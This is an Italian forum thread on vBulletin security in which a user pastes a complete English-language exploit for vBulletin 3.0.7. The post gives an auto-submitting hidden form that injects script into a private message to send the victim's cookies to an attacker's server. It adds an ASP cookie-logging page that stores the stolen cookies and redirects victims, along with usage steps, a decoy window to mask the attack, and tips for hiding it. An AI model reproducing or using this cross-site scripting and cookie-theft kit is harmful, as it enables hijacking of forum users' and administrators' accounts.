Discussione: Vulnerabilità vBulletin

Ragazzi, la parolina LAMER vi dice qualcosina?

Originariamente Scritto da y2ksw

Esistono siti esterni, che permettono di simulare un attacco, e rivelano tutte le possibili falle del proprio sistema. Con l'aiuto di questi siti si riesce a 'tappare' ogni buco e risolvere la maggioranza dei problemi alla radice.

Non sarebbe male stilare un bell'elenco dei siti di "Tiger team", cosi se qualcuno ne avrà mai bisogno......

sicuri che non è possibile bucarlo?? con la versione 3.0.7 esiste un exploit... non posso postarlo in quanto questo non è un sito hacker.... però il sistema ci sta e proprio tramite vbulletin, senza passare ne dall'hoster, ne da ftp ne usando accessi da admin (quelli li prendi con l'exploit)....

vorrei darvi più dettagli, ma l'unico modo che lo possiate capire, è che vi posto l'exploit direttamente!! Si passa tramite XSS.... mi spiace che non posso esserve di aiuto ma non lo conosco come exploit... sò che esiste, sò dove prenderlo, ma non ci capisco nulla :-|

io ve lo posto, poi se lo volete levare lo levate... okey??

è in inglese per cui... dovrete tradurre tutto voi.. come vi ho detto nn capisco na mazza, ma l'ho preso da un sito dove hanno solo exploit...

first off lets look at the code involved:

Codice:

  <html>
      <head>
         <title>  </title>
      </head>
      <script language = "JavaScript">
         function autosubmit()
                {
                  document.vbform.submit();
                  self.close;
                }
         function settime()
                {
                  window.open("http://www.naasalansar.com",null,& #34;height=900,width=1100,status=yes,toolbar=yes,menubar=yes,resizable=yes,locat
ion=yes,scrollbars=yes");
                  setTimeout("autosubmit()", 0.25);
                }
      </script>
      <body onLoad="settime()">
<script type="text/javascript">
<!--
function checkpm(formname)
{
var result = validatePost(formname, formname.title.value, 0, 5000);

if (result == false)
{
 formname.dopreview = false;
 return result;
}
else if (formname.dopreview != true)
{

 if (confirm("Request a read receipt for this message?"))
 {
  formname.receipt.value = 1;
 }

}

return result;
}
//-->
</script>
         <form action="http://path.to.vbulletin/private.php" method="post" name="vbform" onsubmit="return checkpm(this)">
<input type ="hidden" name="preview" value="Preview+Message" />
<input type="hidden" name="recipients" value="" />
<input type="hidden" name="title" value="<script>location.href='http://192.168.1.2/?ac='+document.cookie</script>" />
<input type="hidden" name="WYSIWYG_HTML" id="html_hidden_field" value="rawd al jinan sawt al hisan" />
<input type="hidden" name="s" value="" />
 <input type="hidden" name="do" value="insertpm" />
 <input type="hidden" name="pmid" value="" />
 <input type="hidden" name="forward" value="" />
 <input type="hidden" name="receipt" value="0" />
<input type="hidden" class="hidden" name="sbutton" value="Submit Message" accesskey="s" tabindex="1" />
 <input type="hidden" class="button" value="Preview Message" accesskey="p" name="preview" tabindex="1" onclick="this.form.dopreview = true; return true;" />
</form>
      </body>
   </html>

now im not very good with java script so i dont know how much of that code is needed but i DO know that this works.

we all know the XSS ability in PREVIEWING a PM so i made a hidden form which auto submits and posts the same data as the exploit.

ok so here is how to use:

change the names in the code to point to your domain. at the top you will see:

Codice:

window.open("http://www.naasalansar.com",null,& #34;height=900,width=1100,status=yes,toolbar=yes,menubar=yes,resizable=yes,locat
ion=yes,scrollbars=yes");

this is because i wanted a window to appear which blocks what the user sees in the background, so i would say something like "check out my site" or something to that effect...

this isnt neccesary as all the XSS is done hidden.

here are some other things you have to change:

Codice:

 <form action="http://path.to.vbulletin/private.php" method="post" name="vbform" onsubmit="return checkpm(this)">

the name of the form is usually vbform i doubt the admin would have changed it but if it doesnt work then change it.

Codice:

<input type="hidden" name="title" value="<script>location.href='http://192.168.1.2/?ac='+document.cookie</script>" />

this is the title... 192.168.1.2 in my case was my server PC... change this to your webpage which will log the cookie info...

Codice:

<input type="hidden" name="WYSIWYG_HTML" id="html_hidden_field" value="rawd al jinan sawt al hisan" />

this is the msg in the previewed PM... this doesnt matter what it says as it isnt seen by the user because after the cookie is logged they are redirected straight away. BUT IT MUST CONTAIN SOMETHING OR THE HACK WONT WORK!! (i dont think it will anyway lol best be on the safe side)

Codice:

<input type="hidden" name="receipt" value="0" />

If you want a read reciept (maybe to make sure the person has read it) then set this to "1".

because i HAVENT been able to spoof the header you will have to put the file in a document repository or something to FORCE the download box to appear. because when the browser opens the new window there is no previous URL hence no referer hence no validation check smile.gif

now on my SERVER i used ASP:

Codice:

index.asp:

<%@LANGUAGE="VBSCRIPT" CODEPAGE="1252"%>
<%
dim conn, rs, getstring, SQLStmt, cStr, DBQ
getstring = request.QueryString("ac")
if len("getstring") > 1 then
set conn= server.CreateObject("ADODB.Connection")
set rs = server.CreateObject("ADODB.Recordset")
conn.Open ("DRIVER=Mcft Access Driver (*.mdb);DBQ=" & Server.MapPath("/db/poster.mdb"))
SQLStmt = "SELECT * FROM cookie"
RS.Open SQLStmt, Conn, 3, 3
rs.AddNew
rs("cookie") = getstring
rs.update
rs.close
end if
set conn=nothing
set rs=nothing
%>

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html>
<head>
<meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1">
<title>Cross Site Script!! WOOOOOT!</title>
</head>

<body>
<%
set conn = server.CreateObject("ADODB.Connection")
conn.Open ("DRIVER=Mcft Access Driver (*.mdb);DBQ=" & Server.MapPath("/mafiastylegangs/db/poster.mdb"))
set rs = server.createobject("ADODB.recordset")
sql = "Select * from cookie"
RS.Open sql, Conn, 3, 3
do until rs.eof
%>
<b><%=rs("cookie")%></b><br><BR>
<%
rs.movenext
loop
rs.close
dim admin
admin =request.querystring("admin")
if not admin="yes" then response.redirect("http://www.naasalansar.com")
%>

</body>
</html>

here is what it does:

it has a simple protection feature if the querystring admin = yes then i can view the cookies rather than having it log it...

but if its empty then the cookie will be logged to the database and redirected to your final site...

so if i say "check out this article:"

then your final redirect should look like:

Codice:

if not admin="yes" then response.redirect("http://www.timesonline.com/blahblahblah.html")

thats all for now... there is only so much detail one man can take lol

btw you might want to modify this line to something less conspicuous:

Codice:

<title>Cross Site Script!! WOOOOOT!</title>

some improvements that can be made:

spoof the header to the domain of ure victim forum so the person doenst have to download the file but just click on a link instead.

thats all i can think off cheers
------------------------------------------------------------------------------------

End of exploit

by: barodate
thanks to every1 at h4cky0u!!!!

i know its rather long but maybe some of the l337 coders here can make it a perl script or something...

enjoy




Ecco a voi, quello è tutto l'eploit...